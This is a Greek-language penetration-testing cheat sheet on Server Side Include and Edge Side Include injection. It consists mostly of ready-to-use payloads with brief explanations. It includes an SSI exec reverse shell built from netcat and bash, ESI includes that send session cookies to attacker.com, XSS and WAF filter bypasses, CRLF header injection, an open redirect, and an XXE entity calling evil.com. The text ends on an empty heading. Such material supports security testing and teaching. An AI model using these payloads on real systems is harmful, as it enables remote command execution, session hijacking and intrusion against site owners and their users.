Server Side Inclusion/Edge Side Inclusion Injection

Server Side Inclusion Basic Information

(Introduction taken from Apache docs)

SSI (Server Side Includes) είναι εντολές που τοποθετούνται σε σελίδες HTML και αξιολογούνται στον διακομιστή ενώ οι σελίδες εξυπηρετούνται. Σας επιτρέπουν να προσθέσετε δυναμικά παραγόμενο περιεχόμενο σε μια υπάρχουσα σελίδα HTML, χωρίς να χρειάζεται να εξυπηρετήσετε ολόκληρη τη σελίδα μέσω ενός προγράμματος CGI ή άλλης δυναμικής τεχνολογίας. Για παράδειγμα, μπορείτε να τοποθετήσετε μια εντολή σε μια υπάρχουσα σελίδα HTML, όπως:

<!--#echo var="DATE_LOCAL" -->

Και, όταν η σελίδα εξυπηρετείται, αυτό το τμήμα θα αξιολογηθεί και θα αντικατασταθεί με την τιμή του:

Tuesday, 15-Jan-2013 19:28:54 EST

Η απόφαση για το πότε να χρησιμοποιήσετε SSI και πότε να έχετε τη σελίδα σας να παράγεται εξ ολοκλήρου από κάποιο πρόγραμμα, είναι συνήθως θέμα του πόσο στατική είναι η σελίδα και πόσο χρειάζεται να επαναϋπολογίζεται κάθε φορά που εξυπηρετείται η σελίδα. Το SSI είναι ένας εξαιρετικός τρόπος για να προσθέσετε μικρά κομμάτια πληροφοριών, όπως η τρέχουσα ώρα - όπως φαίνεται παραπάνω. Αλλά αν η πλειοψηφία της σελίδας σας παράγεται τη στιγμή που εξυπηρετείται, πρέπει να αναζητήσετε κάποια άλλη λύση.

Μπορείτε να συμπεράνετε την παρουσία του SSI αν η διαδικτυακή εφαρμογή χρησιμοποιεί αρχεία με τις επεκτάσεις ** .shtml, .shtm ή .stm**, αλλά δεν είναι μόνο αυτή η περίπτωση.

Μια τυπική έκφραση SSI έχει την εξής μορφή:

<!--#directive param="value" -->

Έλεγχος

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

Edge Side Inclusion

Υπάρχει ένα πρόβλημα με την αποθήκευση πληροφοριών ή δυναμικών εφαρμογών καθώς μέρος του περιεχομένου μπορεί να έχει διαφορεθεί για την επόμενη φορά που θα ανακτηθεί το περιεχόμενο. Αυτό είναι που χρησιμοποιείται το ESI, για να υποδείξει χρησιμοποιώντας ετικέτες ESI το δυναμικό περιεχόμενο που πρέπει να παραχθεί πριν από την αποστολή της έκδοσης cache. Εάν ένας επιτιθέμενος είναι σε θέση να εισάγει μια ετικέτα ESI μέσα στο περιεχόμενο cache, τότε θα μπορούσε να είναι σε θέση να εισάγει αυθαίρετο περιεχόμενο στο έγγραφο πριν σταλεί στους χρήστες.

ESI Detection

Η παρακάτω κεφαλίδα σε μια απάντηση από τον διακομιστή σημαίνει ότι ο διακομιστής χρησιμοποιεί ESI:

Surrogate-Control: content="ESI/1.0"

Αν δεν μπορείτε να βρείτε αυτή την κεφαλίδα, ο διακομιστής μπορεί να χρησιμοποιεί ESI ούτως ή άλλως. Μια προσέγγιση τυφλής εκμετάλλευσης μπορεί επίσης να χρησιμοποιηθεί καθώς ένα αίτημα θα πρέπει να φτάσει στον διακομιστή των επιτιθεμένων:

// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

ESI exploitation

GoSecure δημιούργησε έναν πίνακα για να κατανοήσουμε τις πιθανές επιθέσεις που μπορούμε να δοκιμάσουμε σε διάφορα λογισμικά που υποστηρίζουν ESI, ανάλογα με τη λειτουργικότητα που υποστηρίζουν:

• Includes: Υποστηρίζει την εντολή <esi:includes>

• Vars: Υποστηρίζει την εντολή <esi:vars>. Χρήσιμο για την παράκαμψη φίλτρων XSS

• Cookie: Τα cookies του εγγράφου είναι προσβάσιμα στον κινητήρα ESI

• Upstream Headers Required: Οι εφαρμογές υποκατάστασης δεν θα επεξεργαστούν δηλώσεις ESI εκτός αν η upstream εφαρμογή παρέχει τις κεφαλίδες

• Host Allowlist: Σε αυτή την περίπτωση, οι ESI includes είναι δυνατές μόνο από επιτρεπόμενους διακομιστές, καθιστώντας το SSRF, για παράδειγμα, δυνατό μόνο κατά αυτών των διακομιστών

XSS

Η παρακάτω εντολή ESI θα φορτώσει ένα αυθαίρετο αρχείο μέσα στην απόκριση του διακομιστή

<esi:include src=http://attacker.com/xss.html>

Παράκαμψη προστασίας XSS πελάτη

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>

Κλοπή Cookie

• Απομακρυσμένη κλοπή cookie

<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />

• Κλέψτε το cookie HTTP_ONLY με XSS αντανακλώντας το στην απάντηση:

# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions

Ιδιωτικό Τοπικό Αρχείο

Μην το συγχέετε με μια "Τοπική Συμπερίληψη Αρχείου":

<esi:include src="secret.txt">

CRLF

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

Το παρακάτω θα προσθέσει ένα Location header στην απάντηση

<!--esi $add_header('Location','http://attacker.com') -->

Προσθήκη Κεφαλίδας

• Προσθήκη κεφαλίδας σε αναγκαστικό αίτημα

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>

• Προσθέστε κεφαλίδα στην απάντηση (χρήσιμο για να παρακάμψετε το "Content-Type: text/json" σε μια απάντηση με XSS)

<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode to know how many times you can URL encode the value

CRLF στο Add header (CVE-2019-2438)

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

Akamai debug

Αυτό θα στείλει πληροφορίες αποσφαλμάτωσης που περιλαμβάνονται στην απάντηση:

<esi:debug/>

ESI + XSLT = XXE

Με την καθορισμένη τιμή xslt για την παράμετρο dca, είναι εφικτό να συμπεριληφθεί eXtensible Stylesheet Language Transformations (XSLT) βασισμένο ESI. Η συμπερίληψη προκαλεί την ανάκτηση των αρχείων XML και XSLT από τον HTTP surrogate, με το δεύτερο να φιλτράρει το πρώτο. Τέτοια αρχεία XML είναι εκμεταλλεύσιμα για επιθέσεις XML External Entity (XXE), επιτρέποντας στους επιτιθέμενους να εκτελούν επιθέσεις SSRF. Ωστόσο, η χρησιμότητα αυτής της προσέγγισης είναι περιορισμένη, καθώς το ESI περιλαμβάνει ήδη ως vector SSRF. Λόγω της απουσίας υποστήριξης στη βασική βιβλιοθήκη Xalan, οι εξωτερικές DTDs δεν επεξεργάζονται, αποτρέποντας την εξαγωγή τοπικών αρχείων.

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

XSLT αρχείο:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

Check the XSLT page:

Αναφορές

• https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/

• https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/

• https://academy.hackthebox.com/module/145/section/1304

• https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91

Λίστα Ανίχνευσης Brute-Force